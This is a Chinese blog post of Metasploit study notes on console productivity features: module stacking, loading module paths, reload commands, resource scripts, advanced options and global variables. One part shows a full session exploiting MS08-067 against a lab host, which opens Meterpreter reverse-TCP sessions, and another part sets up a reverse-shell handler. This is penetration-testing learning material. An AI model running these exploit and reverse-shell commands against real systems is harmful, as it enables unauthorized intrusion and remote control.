提高Metasploit渗透测试的速度

最新推荐文章于 2024-01-06 12:00:00 发布

我重来不说话

最新推荐文章于 2024-01-06 12:00:00 发布

阅读量405

点赞数 2

分类专栏：精通Metasploit学习笔记文章标签： metasploit 渗透测试 kali linux

本文链接：https://blog.csdn.net/qq_19623861/article/details/116790280

版权

精通Metasploit学习笔记专栏收录该内容

41 篇文章 30 订阅

订阅专栏

1.两个命令pushm和popm，模块入栈出栈

msf6 exploit(multi/handler) > pushm
msf6 exploit(multi/handler) > search ms08_067
us
Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

emsf6 exploit(multi/handler) > use 0
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.115
rhosts => 192.168.1.115
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.115:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 2 opened (192.168.1.113:4444 -> 192.168.1.115:1133) at 2021-05-14 14:29:40 +0800

meterpreter > [*] Meterpreter session 3 opened (192.168.1.113:4444 -> 192.168.1.115:1123) at 2021-05-14 14:29:40 +0800

meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/smb/ms08_067_netapi) > popm
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >

可以看出，之前我们使用的是handler模块，然后进行pushm，把模块压入栈中，在使用其他模块进行渗透，渗透结束后在使用popm把栈中的模块弹出来

2.loadpath加载特定文件夹内的模块

msf6 exploit(multi/handler) > loadpath /root/桌面/mods
Loaded 0 modules:

3.reload，edit，reload_all

edit 编辑模块内容
reload_all 重新加载全部模块
reload 重新加载当前模块

msf6 exploit(multi/handler) > reload
[*] Reloading module...
msf6 exploit(multi/handler) > edit

msf6 exploit(multi/handler) > reload_all
[*] Reloading modules from all module paths...
[-] WARNING! The following modules could not be loaded!
[-]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[-]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[-]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[-]     /root/桌面/mods/exploits/misc/web.rb
[-] Please see /root/.msf4/logs/framework.log for details.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                          
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                          
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%                                                                          
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                          
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                          
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                          
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                          
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%                                                                          
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%                                                                          
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%                                                                          
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%                                                                          
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %                                                                          
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%                                                                          
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%                                                                          
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                          
                                                                                                                                                       

       =[ metasploit v6.0.43-dev                          ]
+ -- --=[ 2129 exploits - 1137 auxiliary - 363 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more

4.资源脚本

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) > makerc h_1
[*] Saving last 3 commands to h_1 ...
msf6 exploit(multi/handler) > resource  h_1
[*] Processing /root/h_1 for ERB directives.
resource (/root/h_1)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/root/h_1)> options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


resource (/root/h_1)> set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) >

mkerc name 用来保存脚本
resource name 执行保存的脚本

5.使用AutoRunScript

查看AutoRunScript选项

msf6 exploit(multi/handler) > show advanced

Module advanced options (exploit/multi/handler):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ExitOnSession           true             yes       Return from the exploit after a session has been created
   ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session


Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but d
                                                          irectly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

msf6 exploit(multi/handler) >

6.全局变量

使用setg设置rhosts

setg rhosts 192.168.1.113

我重来不说话

关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
提高Metasploit渗透测试的速度

这里写目录标题1.两个命令pushm和popm，模块入栈出栈2.loadpath加载特定文件夹内的模块3.reload，edit，reload_all4.资源脚本5.使用AutoRunScript1.两个命令pushm和popm，模块入栈出栈msf6 exploit(multi/handler) > pushmmsf6 exploit(multi/handler) > search ms08_067usMatching Modules================ # N
复制链接

扫一扫